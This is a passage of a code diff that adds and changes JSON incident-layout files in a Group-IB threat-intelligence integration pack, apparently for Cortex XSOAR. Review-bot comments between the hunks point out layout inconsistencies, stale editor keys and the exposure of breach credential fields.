"sectionItemType": "field", + "startCol": 1 + }, + { + "endCol": 2, + "fieldId": "dbotclosed", + "height": 22, + "id": "incident-closed-field", + "index": 1, + 
"sectionItemType": "field", + "startCol": 1 + } + ], + "maxW": 3, + "moved": false, + "name": "Timeline Information", + "static": false, + "w": 1, + "x": 0, + "y": 7 + }, + { + "displayType": "ROW", + "h": 2, + "i": "caseinfoid-88e6bf70-a0b1-11e9-b27f-13ae1773d289", + "isVisible": true, + "items": [ + { + "endCol": 2, + "fieldId": "dbotclosed", + "height": 22, + "id": "incident-dbotClosed-field", + "index": 0, + "sectionItemType": "field", + "startCol": 0 + }, + { + "endCol": 2, + "fieldId": "closereason", + "height": 22, + "id": "incident-closeReason-field", + "index": 1, + "sectionItemType": "field", + "startCol": 0 + }, + { + "endCol": 2, + "fieldId": "closenotes", + "height": 22, + "id": "incident-closeNotes-field", + "index": 2, + "sectionItemType": "field", + "startCol": 0 + } + ], + "maxW": 3, + "moved": false, + "name": "Closing Information", + "static": false, + "w": 1, + "x": 0, + "y": 11 + }, + { + "displayType": "CARD", + "h": 2, + "i": "caseinfoid-e54b1770-a0b1-11e9-b27f-13ae1773d289", + "isVisible": true, + "items": [ + { + "endCol": 2, + "fieldId": "details", + "height": 22, + "id": "incident-details-field", + "index": 0, + "sectionItemType": "field", + "startCol": 0 + } + ], + "maxW": 3, + "moved": false, + "name": "Investigation Data", + "static": false, + "w": 1, + "x": 1, + "y": 7 + }, + { + "displayType": "ROW", + "h": 3, + "hideName": false, + "i": "caseinfoid-b1e55dc0-71ab-11ef-8c49-f9d8b5e80cf6", + "items": [ + { + "endCol": 4, + "fieldId": "gibid", + "height": 22, + "id": "c0996780-71ab-11ef-8c49-f9d8b5e80cf6", + "index": 0, + "sectionItemType": "field", + "startCol": 0 + }, + { + "endCol": 4, + "fieldId": "gibcybercriminalthreatactoraliases", + "height": 22, + "id": "c32fc9d0-71ab-11ef-8c49-f9d8b5e80cf6", + "index": 1, + "sectionItemType": "field", + "startCol": 0 + }, + { + "endCol": 4, + "fieldId": "gibcybercriminalthreatactordescription", + "height": 44, + "id": "d6014b10-71ab-11ef-8c49-f9d8b5e80cf6", + "index": 2, + "sectionItemType": 
"field", + "startCol": 0 + }, + { + "endCol": 4, + "fieldId": "gibthreatactorisapt", + "height": 22, + "id": "dba589a0-71ab-11ef-8c49-f9d8b5e80cf6", + "index": 3, + "sectionItemType": "field", + "startCol": 0 + }, + { + "endCol": 4, + "fieldId": "gibthreatactorname", + "height": 22, + "id": "de28d920-71ab-11ef-8c49-f9d8b5e80cf6", + "index": 4, + "sectionItemType": "field", + "startCol": 0 + }, + { + "endCol": 4, + "fieldId": "gibcybercriminalexpertises", + "height": 22, + "id": "e0d4e650-71ab-11ef-8c49-f9d8b5e80cf6", + "index": 5, + "sectionItemType": "field", + "startCol": 0 + }, + { + "endCol": 4, + "fieldId": "gibcybercriminalregions", + "height": 22, + "id": "e36a3730-71ab-11ef-8c49-f9d8b5e80cf6", + "index": 6, + "sectionItemType": "field", + "startCol": 0 + }, + { + "endCol": 4, + "fieldId": "gibcybercriminalsectors", + "height": 22, + "id": "e65c4e10-71ab-11ef-8c49-f9d8b5e80cf6", + "index": 7, + "sectionItemType": "field", + "startCol": 0 + }, + { + "endCol": 4, + "fieldId": "gibcybercriminalmalware", + "height": 22, + "id": "e9759c00-71ab-11ef-8c49-f9d8b5e80cf6", + "index": 8, + "sectionItemType": "field", + "startCol": 0 + }, + { + "dropEffect": "move", + "endCol": 4, + "fieldId": "gibportallink", + "height": 22, + "id": "0cd5eca0-8493-11ef-87c7-cfae65ac92d0", + "index": 9, + "listId": "caseinfoid-b1e55dc0-71ab-11ef-8c49-f9d8b5e80cf6", + "sectionItemType": "field", + "startCol": 0 + } + ], + "maxW": 3, + "minH": 1, + "moved": false, + "name": "Information from Group-IB", + "static": false, + "w": 2, + "x": 0, + "y": 4 + }, + { + "displayType": "ROW", + "h": 2, + "hideName": false, + "i": "caseinfoid-41c673e0-7bfa-11ef-96a8-77b28953dd87", + "items": [ + { + "endCol": 2, + "fieldId": "gibdatecreatedat", + "height": 22, + "id": "c8522e30-71ab-11ef-8c49-f9d8b5e80cf6", + "index": 0, + "sectionItemType": "field", + "startCol": 0 + }, + { + "dropEffect": "move", + "endCol": 2, + "fieldId": "gibdateupdatedat", + "height": 22, + "id": 
"cad22250-71ab-11ef-8c49-f9d8b5e80cf6", + "index": 1, + "listId": "caseinfoid-b1e55dc0-71ab-11ef-8c49-f9d8b5e80cf6", + "sectionItemType": "field", + "startCol": 0 + }, + { + "endCol": 2, + "fieldId": "gibdatefirstseen", + "height": 22, + "id": "ce214d50-71ab-11ef-8c49-f9d8b5e80cf6", + "index": 2, + "sectionItemType": "field", + "startCol": 0 + }, + { + "dropEffect": "move", + "endCol": 2, + "fieldId": "gibdatelastseen", + "height": 22, + "id": "d172c240-71ab-11ef-8c49-f9d8b5e80cf6", + "index": 3, + "listId": "caseinfoid-b1e55dc0-71ab-11ef-8c49-f9d8b5e80cf6", + "sectionItemType": "field", + "startCol": 0 + } + ], + "maxW": 3, + "minH": 1, + "moved": false, + "name": "Group-IB Dates", + "static": false, + "w": 1, + "x": 0, + "y": 2 + }, + { + "displayType": "ROW", + "h": 2, + "hideName": false, + "i": "caseinfoid-23c2f320-822e-11ef-9517-e9064fff04ea", + "items": [ + { + "dropEffect": "move", + "endCol": 2, + "fieldId": "gibcybercriminalthreatactorreportstable", + "height": 106, + "id": "302f56d0-822e-11ef-9517-e9064fff04ea", + "index": 0, + "listId": "caseinfoid-23c2f320-822e-11ef-9517-e9064fff04ea", + "sectionItemType": "field", + "startCol": 0 + } + ], + "maxW": 3, + "minH": 1, + "moved": false, + "name": "Group-IB Threat Actor Reports", + "static": false, + "w": 1, + "x": 1, + "y": 2 + } + ], + "type": "custom" + }, + { + "id": "warRoom", + "name": "War Room", + "type": "warRoom" + }, + { + "id": "workPlan", + "name": "Work Plan", + "type": "workPlan" + }, + { + "id": "evidenceBoard", + "name": "Evidence Board", + "type": "evidenceBoard" + }, + { + "id": "relatedIncidents", + "name": "Related Incidents", + "type": "relatedIncidents" + }, + { + "id": "canvas", + "name": "Canvas", + "type": "canvas" + } + ] + }, + "group": "incident", + "id": "GIB Cybercriminal Threat Actor Layout", + "name": "GIB Cybercriminal Threat Actor Layout", + "system": false, + "version": -1, + "fromVersion": "6.10.0" +} \ No newline at end of file 
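Review bot: Several items in the new "Group-IB Dates" section (`gibdateupdatedat`, `gibdatelastseen`) and the "Threat Actor Reports" section carry `"dropEffect": "move"` and a `"listId"` that points at a different section (`caseinfoid-b1e55dc0-…`, the "Information from Group-IB" section) — this is drag-and-drop residue from the layout editor rather than meaningful configuration, and the stale cross-reference is confusing to the next person editing the file. Removing the `dropEffect` and `listId` keys from those items leaves behavior unchanged and matches the rest of the file. Minor consistency point: the "Timeline Information" card uses `"height": 22` here but `53` for the same fields in the Mule layout of this same patch; one value should be chosen.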
diff --git a/Packs/GroupIB_ThreatIntelligenceAttribution/Layouts/layoutscontainer-GIB_Cybercriminal_Threat_Layout.json b/Packs/GroupIB_ThreatIntelligenceAttribution/Layouts/layoutscontainer-GIB_Cybercriminal_Threat_Layout.json
new file mode 100644
index 000000000000..4746e85599cb
--- /dev/null
+++ b/Packs/GroupIB_ThreatIntelligenceAttribution/Layouts/layoutscontainer-GIB_Cybercriminal_Threat_Layout.json
@@ -0,0 +1,591 @@ +{ + "description": "Layout for GIB Cybercriminal Threat", + "detailsV2": { + "tabs": [ + { + "id": "summary", + "name": "Legacy Summary", + "type": "summary" + }, + { + "id": "caseinfoid", + "name": "Incident Info", + "sections": [ + { + "displayType": "ROW", + "h": 2, + "i": "caseinfoid-fce71720-98b0-11e9-97d7-ed26ef9e46c8", + "isVisible": true, + "items": [ + { + "endCol": 2, + "fieldId": "type", + "height": 22, + "id": "incident-type-field", + "index": 0, + "sectionItemType": "field", + "startCol": 0 + }, + { + "endCol": 2, + "fieldId": "severity", + "height": 22, + "id": "incident-severity-field", + "index": 1, + "sectionItemType": "field", + "startCol": 0 + }, + { + "endCol": 2, + "fieldId": "owner", + "height": 22, + "id": "incident-owner-field", + "index": 2, + "sectionItemType": "field", + "startCol": 0 + }, + { + "endCol": 2, + "fieldId": "sourcebrand", + "height": 22, + "id": "incident-sourceBrand-field", + "index": 4, + "sectionItemType": "field", + "startCol": 0 + }, + { + "endCol": 2, + "fieldId": "sourceinstance", + "height": 22, + "id": "incident-sourceInstance-field", + "index": 5, + "sectionItemType": "field", + "startCol": 0 + }, + { + "endCol": 2, + "fieldId": "playbookid", + "height": 22, + "id": "incident-playbookId-field", + "index": 6, + "sectionItemType": "field", + "startCol": 0 + } + ], + "maxW": 3, + "moved": false, + "name": "Case Details", + "static": false, + "w": 1, + "x": 0, + "y": 0 + }, + { + "h": 2, + "i": "caseinfoid-61263cc0-98b1-11e9-97d7-ed26ef9e46c8", + "maxW": 3, + "moved": false, + "name": "Notes", + "static": false, + "type": "notes", + "w": 1, + "x": 2, + "y": 0 + }, + { + "displayType": "ROW", + "h": 2, + "i": "caseinfoid-6aabad20-98b1-11e9-97d7-ed26ef9e46c8", + "maxW": 3, + "moved": false, + "name": "Work Plan", + "static": false, + "type": "workplan", + "w": 1, + "x": 1, + "y": 0 + }, + { + "displayType": "ROW", + "h": 2, + "i": "caseinfoid-770ec200-98b1-11e9-97d7-ed26ef9e46c8", + "isVisible": true, 
+ "maxW": 3, + "moved": false, + "name": "Linked Incidents", + "static": false, + "type": "linkedIncidents", + "w": 1, + "x": 1, + "y": 14 + }, + { + "displayType": "ROW", + "h": 2, + "i": "caseinfoid-842632c0-98b1-11e9-97d7-ed26ef9e46c8", + "maxW": 3, + "moved": false, + "name": "Child Incidents", + "static": false, + "type": "childInv", + "w": 1, + "x": 2, + "y": 4 + }, + { + "displayType": "ROW", + "h": 2, + "i": "caseinfoid-4a31afa0-98ba-11e9-a519-93a53c759fe0", + "maxW": 3, + "moved": false, + "name": "Evidence", + "static": false, + "type": "evidence", + "w": 1, + "x": 2, + "y": 2 + }, + { + "displayType": "ROW", + "h": 2, + "hideName": false, + "i": "caseinfoid-7717e580-9bed-11e9-9a3f-8b4b2158e260", + "maxW": 3, + "moved": false, + "name": "Team Members", + "static": false, + "type": "team", + "w": 1, + "x": 2, + "y": 6 + }, + { + "displayType": "ROW", + "h": 2, + "i": "caseinfoid-7ce69dd0-a07f-11e9-936c-5395a1acf11e", + "maxW": 3, + "moved": false, + "name": "Indicators", + "query": "", + "queryType": "input", + "static": false, + "type": "indicators", + "w": 2, + "x": 0, + "y": 12 + }, + { + "displayType": "CARD", + "h": 2, + "i": "caseinfoid-ac32f620-a0b0-11e9-b27f-13ae1773d289", + "items": [ + { + "endCol": 1, + "fieldId": "occurred", + "height": 22, + "id": "incident-occurred-field", + "index": 0, + "sectionItemType": "field", + "startCol": 0 + }, + { + "endCol": 1, + "fieldId": "dbotmodified", + "height": 22, + "id": "incident-modified-field", + "index": 1, + "sectionItemType": "field", + "startCol": 0 + }, + { + "endCol": 2, + "fieldId": "dbotduedate", + "height": 22, + "id": "incident-dueDate-field", + "index": 2, + "sectionItemType": "field", + "startCol": 0 + }, + { + "endCol": 2, + "fieldId": "dbotcreated", + "height": 22, + "id": "incident-created-field", + "index": 0, + "sectionItemType": "field", + "startCol": 1 + }, + { + "endCol": 2, + "fieldId": "dbotclosed", + "height": 22, + "id": "incident-closed-field", + "index": 1, + "sectionItemType": 
"field", + "startCol": 1 + } + ], + "maxW": 3, + "moved": false, + "name": "Timeline Information", + "static": false, + "w": 1, + "x": 0, + "y": 10 + }, + { + "displayType": "ROW", + "h": 2, + "i": "caseinfoid-88e6bf70-a0b1-11e9-b27f-13ae1773d289", + "isVisible": true, + "items": [ + { + "endCol": 2, + "fieldId": "dbotclosed", + "height": 22, + "id": "incident-dbotClosed-field", + "index": 0, + "sectionItemType": "field", + "startCol": 0 + }, + { + "endCol": 2, + "fieldId": "closereason", + "height": 22, + "id": "incident-closeReason-field", + "index": 1, + "sectionItemType": "field", + "startCol": 0 + }, + { + "endCol": 2, + "fieldId": "closenotes", + "height": 22, + "id": "incident-closeNotes-field", + "index": 2, + "sectionItemType": "field", + "startCol": 0 + } + ], + "maxW": 3, + "moved": false, + "name": "Closing Information", + "static": false, + "w": 1, + "x": 0, + "y": 14 + }, + { + "displayType": "CARD", + "h": 2, + "i": "caseinfoid-e54b1770-a0b1-11e9-b27f-13ae1773d289", + "isVisible": true, + "items": [ + { + "endCol": 2, + "fieldId": "details", + "height": 22, + "id": "incident-details-field", + "index": 0, + "sectionItemType": "field", + "startCol": 0 + } + ], + "maxW": 3, + "moved": false, + "name": "Investigation Data", + "static": false, + "w": 1, + "x": 1, + "y": 10 + }, + { + "displayType": "ROW", + "h": 2, + "hideName": false, + "i": "caseinfoid-311327e0-71ab-11ef-8c49-f9d8b5e80cf6", + "items": [ + { + "endCol": 2, + "fieldId": "gibadmiraltycode", + "height": 22, + "id": "4ff160a0-71ab-11ef-8c49-f9d8b5e80cf6", + "index": 0, + "sectionItemType": "field", + "startCol": 0 + }, + { + "endCol": 2, + "fieldId": "gibcredibility", + "height": 22, + "id": "52d100f0-71ab-11ef-8c49-f9d8b5e80cf6", + "index": 1, + "sectionItemType": "field", + "startCol": 0 + }, + { + "endCol": 2, + "fieldId": "gibreliability", + "height": 22, + "id": "55932e30-71ab-11ef-8c49-f9d8b5e80cf6", + "index": 2, + "sectionItemType": "field", + "startCol": 0 + }, + { + "endCol": 2, + 
"fieldId": "gibseverity", + "height": 22, + "id": "57f428a0-71ab-11ef-8c49-f9d8b5e80cf6", + "index": 3, + "sectionItemType": "field", + "startCol": 0 + } + ], + "maxW": 3, + "minH": 1, + "moved": false, + "name": "Group-IB Evaluation", + "static": false, + "w": 1, + "x": 1, + "y": 2 + }, + { + "displayType": "ROW", + "h": 4, + "hideName": false, + "i": "caseinfoid-31ce88a0-71ab-11ef-8c49-f9d8b5e80cf6", + "items": [ + { + "endCol": 4, + "fieldId": "gibid", + "height": 22, + "id": "6efb8b60-71ab-11ef-8c49-f9d8b5e80cf6", + "index": 0, + "sectionItemType": "field", + "startCol": 0 + }, + { + "endCol": 4, + "fieldId": "gibcybercriminalthreattitle", + "height": 22, + "id": "71d908d0-71ab-11ef-8c49-f9d8b5e80cf6", + "index": 1, + "sectionItemType": "field", + "startCol": 0 + }, + { + "endCol": 4, + "fieldId": "gibcybercriminalthreatdescription", + "height": 44, + "id": "7565d910-71ab-11ef-8c49-f9d8b5e80cf6", + "index": 2, + "sectionItemType": "field", + "startCol": 0 + }, + { + "endCol": 4, + "fieldId": "gibdatecreatedat", + "height": 22, + "id": "77d1d000-71ab-11ef-8c49-f9d8b5e80cf6", + "index": 3, + "sectionItemType": "field", + "startCol": 0 + }, + { + "endCol": 4, + "fieldId": "gibdatefirstseen", + "height": 22, + "id": "7a5c2460-71ab-11ef-8c49-f9d8b5e80cf6", + "index": 4, + "sectionItemType": "field", + "startCol": 0 + }, + { + "endCol": 4, + "fieldId": "gibdatelastseen", + "height": 22, + "id": "7edd18a0-71ab-11ef-8c49-f9d8b5e80cf6", + "index": 5, + "sectionItemType": "field", + "startCol": 0 + }, + { + "endCol": 4, + "fieldId": "gibistailored", + "height": 22, + "id": "8220f900-71ab-11ef-8c49-f9d8b5e80cf6", + "index": 6, + "sectionItemType": "field", + "startCol": 0 + }, + { + "endCol": 4, + "fieldId": "gibcybercriminalexpertises", + "height": 22, + "id": "8567e6a0-71ab-11ef-8c49-f9d8b5e80cf6", + "index": 7, + "sectionItemType": "field", + "startCol": 0 + }, + { + "endCol": 4, + "fieldId": "gibcybercriminalregions", + "height": 22, + "id": 
"8bb33aa0-71ab-11ef-8c49-f9d8b5e80cf6", + "index": 8, + "sectionItemType": "field", + "startCol": 0 + }, + { + "endCol": 4, + "fieldId": "gibcybercriminalsectors", + "height": 22, + "id": "8f6c4b00-71ab-11ef-8c49-f9d8b5e80cf6", + "index": 9, + "sectionItemType": "field", + "startCol": 0 + }, + { + "endCol": 4, + "fieldId": "gibreportnumber", + "height": 22, + "id": "921ff950-71ab-11ef-8c49-f9d8b5e80cf6", + "index": 10, + "sectionItemType": "field", + "startCol": 0 + }, + { + "endCol": 4, + "fieldId": "gibportallink", + "height": 22, + "id": "fa2b7b60-8492-11ef-87c7-cfae65ac92d0", + "index": 11, + "sectionItemType": "field", + "startCol": 0 + } + ], + "maxW": 3, + "minH": 1, + "moved": false, + "name": "Information from Group-IB", + "static": false, + "w": 2, + "x": 0, + "y": 6 + }, + { + "displayType": "ROW", + "h": 2, + "hideName": false, + "i": "caseinfoid-357b6400-71ab-11ef-8c49-f9d8b5e80cf6", + "items": [ + { + "endCol": 4, + "fieldId": "gibcybercriminalforumstable", + "height": 106, + "id": "17921b70-8176-11ef-84bc-e146948281c8", + "index": 0, + "sectionItemType": "field", + "startCol": 0 + } + ], + "maxW": 3, + "minH": 1, + "moved": false, + "name": "Group-IB Cybercriminal Forum Information", + "static": false, + "w": 2, + "x": 0, + "y": 4 + }, + { + "displayType": "ROW", + "h": 2, + "hideName": false, + "i": "caseinfoid-36403aa0-71ab-11ef-8c49-f9d8b5e80cf6", + "items": [ + { + "endCol": 2, + "fieldId": "gibthreatactorcountry", + "height": 22, + "id": "417752a0-71ab-11ef-8c49-f9d8b5e80cf6", + "index": 0, + "sectionItemType": "field", + "startCol": 0 + }, + { + "endCol": 2, + "fieldId": "gibthreatactorid", + "height": 22, + "id": "43fb1750-71ab-11ef-8c49-f9d8b5e80cf6", + "index": 1, + "sectionItemType": "field", + "startCol": 0 + }, + { + "endCol": 2, + "fieldId": "gibthreatactorisapt", + "height": 22, + "id": "4695bf60-71ab-11ef-8c49-f9d8b5e80cf6", + "index": 2, + "sectionItemType": "field", + "startCol": 0 + }, + { + "endCol": 2, + "fieldId": 
"gibthreatactorname", + "height": 22, + "id": "4953a6e0-71ab-11ef-8c49-f9d8b5e80cf6", + "index": 3, + "sectionItemType": "field", + "startCol": 0 + } + ], + "maxW": 3, + "minH": 1, + "moved": false, + "name": "Group-IB Threat Actor", + "static": false, + "w": 1, + "x": 0, + "y": 2 + } + ], + "type": "custom" + }, + { + "id": "warRoom", + "name": "War Room", + "type": "warRoom" + }, + { + "id": "workPlan", + "name": "Work Plan", + "type": "workPlan" + }, + { + "id": "evidenceBoard", + "name": "Evidence Board", + "type": "evidenceBoard" + }, + { + "id": "relatedIncidents", + "name": "Related Incidents", + "type": "relatedIncidents" + }, + { + "id": "canvas", + "name": "Canvas", + "type": "canvas" + } + ] + }, + "group": "incident", + "id": "GIB Cybercriminal Threat Layout", + "name": "GIB Cybercriminal Threat Layout", + "system": false, + "version": -1, + "fromVersion": "6.10.0" +} \ No newline at end of file diff --git a/Packs/GroupIB_ThreatIntelligenceAttribution/Layouts/layoutscontainer-GIB_Data_Breach_Layout.json b/Packs/GroupIB_ThreatIntelligenceAttribution/Layouts/layoutscontainer-GIB_Data_Breach_Layout.json index 9e8e3a74d895..41b59b803f73 100644 --- a/Packs/GroupIB_ThreatIntelligenceAttribution/Layouts/layoutscontainer-GIB_Data_Breach_Layout.json +++ b/Packs/GroupIB_ThreatIntelligenceAttribution/Layouts/layoutscontainer-GIB_Data_Breach_Layout.json @@ -126,7 +126,7 @@ "type": "linkedIncidents", "w": 1, "x": 1, - "y": 8 + "y": 10 }, { "displayType": "ROW", @@ -181,7 +181,7 @@ "type": "indicators", "w": 2, "x": 0, - "y": 6 + "y": 8 }, { "displayType": "CARD", @@ -240,7 +240,7 @@ "static": false, "w": 1, "x": 0, - "y": 4 + "y": 6 }, { "displayType": "ROW", @@ -282,7 +282,7 @@ "static": false, "w": 1, "x": 0, - "y": 8 + "y": 10 }, { "displayType": "CARD", @@ -306,7 +306,7 @@ "static": false, "w": 1, "x": 1, - "y": 4 + "y": 6 }, { "description": "", 
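Review bot: The new Cybercriminal Threat layout folds the date fields (`gibdatecreatedat`, `gibdatefirstseen`, `gibdatelastseen`) into the "Information from Group-IB" section, whereas the sibling Threat Actor layout added in the same patch gives them their own "Group-IB Dates" section; analysts switching between the two incident types will find the same data in different places, so it would be better to pick one arrangement for both. A small structural note as well: the "Case Details" item indexes jump from 2 to 4, which is harmless but looks like a leftover from the stock layout the file was copied from and could be renumbered.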
@@ -316,65 +316,171 @@ "i": "caseinfoid-34740850-72c7-11eb-9bde-efbce7414b24", "items": [ { - "dropEffect": "move", "endCol": 4, - "fieldId": "gibemail", + "fieldId": "gibid", "height": 22, - "id": "c7949780-cea2-11eb-bac7-713ca72ecbc9", + "id": "7dc29870-84a5-11ef-9251-010edaf46cbc", "index": 0, - "listId": "caseinfoid-34740850-72c7-11eb-9bde-efbce7414b24", "sectionItemType": "field", "startCol": 0 }, { - "dropEffect": "move", "endCol": 4, "fieldId": "gibleakname", "height": 22, - "id": "be8170f0-cea2-11eb-bac7-713ca72ecbc9", + "id": "81686ef0-84a5-11ef-9251-010edaf46cbc", "index": 1, - "listId": "caseinfoid-34740850-72c7-11eb-9bde-efbce7414b24", "sectionItemType": "field", "startCol": 0 }, { - "dropEffect": "move", "endCol": 4, - "fieldId": "gibpassword", + "fieldId": "gibpasswords", "height": 22, - "id": "c29ac9c0-cea2-11eb-bac7-713ca72ecbc9", + "id": "8572fab0-84a5-11ef-9251-010edaf46cbc", "index": 2, - "listId": "caseinfoid-34740850-72c7-11eb-9bde-efbce7414b24", "sectionItemType": "field", "startCol": 0 }, { "endCol": 4, - "fieldId": "gibid", + "fieldId": "description", "height": 22, - "id": "61566e50-30de-11ec-bc63-2be9e447c87d", + "id": "88b8d6e0-84a5-11ef-9251-010edaf46cbc", "index": 3, "sectionItemType": "field", "startCol": 0 }, { "endCol": 4, - "fieldId": "gibseverity", + "fieldId": "gibemails", "height": 22, - "id": "650804a0-30de-11ec-bc63-2be9e447c87d", + "id": "8d589dc0-84a5-11ef-9251-010edaf46cbc", "index": 4, "sectionItemType": "field", "startCol": 0 + }, + { + "endCol": 4, + "fieldId": "gibemaildomains", + "height": 22, + "id": "91487590-84a5-11ef-9251-010edaf46cbc", + "index": 5, + "sectionItemType": "field", + "startCol": 0 + }, + { + "endCol": 4, + "fieldId": "gibportallink", + "height": 22, + "id": "9598bce0-84a5-11ef-9251-010edaf46cbc", + "index": 6, + "sectionItemType": "field", + "startCol": 0 } ], "maxW": 3, "minH": 1, - "minW": 1, "moved": false, - "name": "Information from GIB TIA", + "name": "Information from GIB", "static": false, "w": 
2, "x": 0, + "y": 4 + }, + { + "displayType": "ROW", + "h": 2, + "hideName": false, + "i": "caseinfoid-9a3b9100-84a5-11ef-9251-010edaf46cbc", + "items": [ + { + "endCol": 2, + "fieldId": "gibadmiraltycode", + "height": 22, + "id": "9f512420-84a5-11ef-9251-010edaf46cbc", + "index": 0, + "sectionItemType": "field", + "startCol": 0 + }, + { + "endCol": 2, + "fieldId": "gibcredibility", + "height": 22, + "id": "a280b930-84a5-11ef-9251-010edaf46cbc", + "index": 1, + "sectionItemType": "field", + "startCol": 0 + }, + { + "endCol": 2, + "fieldId": "gibreliability", + "height": 22, + "id": "a4dd6de0-84a5-11ef-9251-010edaf46cbc", + "index": 2, + "sectionItemType": "field", + "startCol": 0 + }, + { + "endCol": 2, + "fieldId": "gibseverity", + "height": 22, + "id": "a8d92c90-84a5-11ef-9251-010edaf46cbc", + "index": 3, + "sectionItemType": "field", + "startCol": 0 + } + ], + "maxW": 3, + "minH": 1, + "moved": false, + "name": "Group-IB Evaluation", + "static": false, + "w": 1, + "x": 0, + "y": 2 + }, + { + "displayType": "ROW", + "h": 2, + "hideName": false, + "i": "caseinfoid-ab93b8b0-84a5-11ef-9251-010edaf46cbc", + "items": [ + { + "endCol": 2, + "fieldId": "gibleakpublished", + "height": 22, + "id": "b3620330-84a5-11ef-9251-010edaf46cbc", + "index": 0, + "sectionItemType": "field", + "startCol": 0 + }, + { + "endCol": 2, + "fieldId": "gibupdatetime", + "height": 22, + "id": "b6526c60-84a5-11ef-9251-010edaf46cbc", + "index": 1, + "sectionItemType": "field", + "startCol": 0 + }, + { + "endCol": 2, + "fieldId": "gibuploadtime", + "height": 22, + "id": "b904e230-84a5-11ef-9251-010edaf46cbc", + "index": 2, + "sectionItemType": "field", + "startCol": 0 + } + ], + "maxW": 3, + "minH": 1, + "moved": false, + "name": "Group-IB Dates", + "static": false, + "w": 1, + "x": 1, "y": 2 } ], @@ -412,6 +518,5 @@ "name": "GIB Data Breach Layout", "system": false, "version": -1, - "fromVersion": "6.0.0", - "marketplaces": ["xsoar"] + "fromVersion": "6.0.0" } \ No newline at end of file 
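Review bot: The section swaps `gibemail`/`gibpassword` for `gibemails`/`gibpasswords` and adds `gibemaildomains`, `gibreliability`, `gibleakpublished`, `gibupdatetime` and `gibuploadtime`; each of these must exist as an incident field and be populated by the updated mapper or the rows render empty, and since the field files are not in this chunk please confirm they ship in the same commit. The `gibpasswords` and `gibemails` rows presumably carry the credentials from the breach record, and this layout shows them to every user who can open the incident, so it is worth deciding whether the default view needs the raw values or whether a count or masked form is enough, and recording that decision in the field description. The section is also renamed to "Information from GIB" while the new layouts in this commit call the same section "Information from Group-IB"; one spelling across the pack would help analysts moving between incident types.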
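Review bot: Dropping `"marketplaces": ["xsoar"]` changes where this layout is shipped: with the key absent the item is, as far as I recall, packaged for every marketplace rather than XSOAR only, so confirm the pack is meant to appear in the other marketplaces and that the GIB fields it references are available there too. The hunk also leaves `fromVersion` at `6.0.0` while every new layout in this commit declares `6.10.0`; if the renamed fields or the added sections depend on the newer version, align it, otherwise a sentence in the PR description on why the existing layouts keep `6.0.0` would save the next reviewer the question.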
diff --git a/Packs/GroupIB_ThreatIntelligenceAttribution/Layouts/layoutscontainer-GIB_Malware_CNC_Layout.json b/Packs/GroupIB_ThreatIntelligenceAttribution/Layouts/layoutscontainer-GIB_Malware_CNC_Layout.json
new file mode 100644
index 000000000000..77fceeb45cf5
--- /dev/null
+++ b/Packs/GroupIB_ThreatIntelligenceAttribution/Layouts/layoutscontainer-GIB_Malware_CNC_Layout.json
@@ -0,0 +1,442 @@ +{ + "description": "Layout for GIB Malware CNC", + "detailsV2": { + "tabs": [ + { + "id": "summary", + "name": "Legacy Summary", + "type": "summary" + }, + { + "id": "caseinfoid", + "name": "Incident Info", + "sections": [ + { + "displayType": "ROW", + "h": 2, + "i": "caseinfoid-fce71720-98b0-11e9-97d7-ed26ef9e46c8", + "isVisible": true, + "items": [ + { + "endCol": 2, + "fieldId": "type", + "height": 22, + "id": "incident-type-field", + "index": 0, + "sectionItemType": "field", + "startCol": 0 + }, + { + "endCol": 2, + "fieldId": "severity", + "height": 22, + "id": "incident-severity-field", + "index": 1, + "sectionItemType": "field", + "startCol": 0 + }, + { + "endCol": 2, + "fieldId": "owner", + "height": 22, + "id": "incident-owner-field", + "index": 2, + "sectionItemType": "field", + "startCol": 0 + }, + { + "endCol": 2, + "fieldId": "sourcebrand", + "height": 22, + "id": "incident-sourceBrand-field", + "index": 3, + "sectionItemType": "field", + "startCol": 0 + }, + { + "endCol": 2, + "fieldId": "sourceinstance", + "height": 22, + "id": "incident-sourceInstance-field", + "index": 4, + "sectionItemType": "field", + "startCol": 0 + }, + { + "endCol": 2, + "fieldId": "playbookid", + "height": 22, + "id": "incident-playbookId-field", + "index": 5, + "sectionItemType": "field", + "startCol": 0 + } + ], + "maxW": 3, + "moved": false, + "name": "Case Details", + "static": false, + "w": 1, + "x": 0, + "y": 0 + }, + { + "h": 2, + "i": "caseinfoid-61263cc0-98b1-11e9-97d7-ed26ef9e46c8", + "maxW": 3, + "moved": false, + "name": "Notes", + "static": false, + "type": "notes", + "w": 1, + "x": 2, + "y": 0 + }, + { + "displayType": "ROW", + "h": 2, + "i": "caseinfoid-6aabad20-98b1-11e9-97d7-ed26ef9e46c8", + "maxW": 3, + "moved": false, + "name": "Work Plan", + "static": false, + "type": "workplan", + "w": 1, + "x": 1, + "y": 0 + }, + { + "displayType": "ROW", + "h": 2, + "i": "caseinfoid-770ec200-98b1-11e9-97d7-ed26ef9e46c8", + "isVisible": true, + "maxW": 
3, + "moved": false, + "name": "Linked Incidents", + "static": false, + "type": "linkedIncidents", + "w": 1, + "x": 1, + "y": 9 + }, + { + "displayType": "ROW", + "h": 2, + "i": "caseinfoid-842632c0-98b1-11e9-97d7-ed26ef9e46c8", + "maxW": 3, + "moved": false, + "name": "Child Incidents", + "static": false, + "type": "childInv", + "w": 1, + "x": 2, + "y": 4 + }, + { + "displayType": "ROW", + "h": 2, + "i": "caseinfoid-4a31afa0-98ba-11e9-a519-93a53c759fe0", + "maxW": 3, + "moved": false, + "name": "Evidence", + "static": false, + "type": "evidence", + "w": 1, + "x": 2, + "y": 2 + }, + { + "displayType": "ROW", + "h": 2, + "hideName": false, + "i": "caseinfoid-7717e580-9bed-11e9-9a3f-8b4b2158e260", + "maxW": 3, + "moved": false, + "name": "Team Members", + "static": false, + "type": "team", + "w": 1, + "x": 2, + "y": 6 + }, + { + "displayType": "ROW", + "h": 2, + "i": "caseinfoid-7ce69dd0-a07f-11e9-936c-5395a1acf11e", + "maxW": 3, + "moved": false, + "name": "Indicators", + "query": "", + "queryType": "input", + "static": false, + "type": "indicators", + "w": 2, + "x": 0, + "y": 7 + }, + { + "displayType": "CARD", + "h": 2, + "i": "caseinfoid-ac32f620-a0b0-11e9-b27f-13ae1773d289", + "items": [ + { + "endCol": 1, + "fieldId": "occurred", + "height": 22, + "id": "incident-occurred-field", + "index": 0, + "sectionItemType": "field", + "startCol": 0 + }, + { + "endCol": 1, + "fieldId": "dbotmodified", + "height": 22, + "id": "incident-modified-field", + "index": 1, + "sectionItemType": "field", + "startCol": 0 + }, + { + "endCol": 2, + "fieldId": 